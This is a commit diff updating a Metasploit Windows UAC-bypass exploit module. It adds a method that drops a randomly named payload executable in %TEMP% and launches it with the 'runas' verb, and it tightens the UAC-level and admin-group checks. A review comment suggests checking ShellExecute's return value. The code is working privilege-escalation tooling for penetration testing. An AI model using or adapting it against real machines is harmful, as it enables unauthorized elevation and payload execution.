Update bypassuac_injection inline with latest privs lib

bug/bundler_fix
Meatballs 2013-10-23 21:15:41 +01:00
parent e6a2a1006f
commit 6fdf5cab15
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 31 additions and 21 deletions


@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Exploit::EXE include Exploit::EXE
include Post::Common
include Post::File include Post::File
include Post::Windows::Priv include Post::Windows::Priv
@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
end end
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
print_status("Payload executed")
end
def exploit def exploit
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
# #
# Verify use against Vista+ # Verify use against Vista+
@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
end end
if is_uac_enabled? if is_uac_enabled?
vprint_status "UAC is Enabled, checking level..." print_status "UAC is Enabled, checking level..."
else else
fail_with(Exploit::Failure::NotVulnerable, if is_in_admin_group?
"UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate" fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
) else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end end
case get_uac_level case get_uac_level
when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Exploit::Failure::NotVulnerable, fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..." "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
) )
when UACDefault when UAC_DEFAULT
print_good "UAC is set to Default" print_good "UAC is set to Default"
vprint_status "BypassUAC can bypass this setting, continuing..." print_good "BypassUAC can bypass this setting, continuing..."
when UACNoPrompt when UAC_NO_PROMPT
fail_with(Exploit::Failure::NotVulnerable, print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
"UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate" runas_method
) return
end end
# Check if you are an admin # Check if you are an admin
@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
if admin_group if admin_group
print_good('Part of Administrators group! Continuing...') print_good('Part of Administrators group! Continuing...')
else else
print_error('Not in admins group, cannot escalate with this module') fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
print_error('Exiting...')
return
end end
end end
if get_integrity_level == LowIntegrityLevel if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level") fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
end end
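Review bot: In the new `runas_method`, the result of `ShellExecuteA` is discarded and `Payload executed` is printed unconditionally, so a declined or failed launch is reported to the operator as success. ShellExecute signals success with a return value greater than 32, so capture it with `res = session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)` and follow it with `fail_with(Exploit::Failure::Unknown, "ShellExecute runas failed: #{res['return']}") unless res['return'] > 32`. The `Uploading payload` status is also printed after `write_file` has already run; moving it before the write keeps the log in step with what actually happened on the host. Separately, the `case get_uac_level` in `exploit` has no `else`, so a nil or unexpected level appears to fall through without any message. The body of `exploit` continues outside the visible hunks, so this may be handled further down.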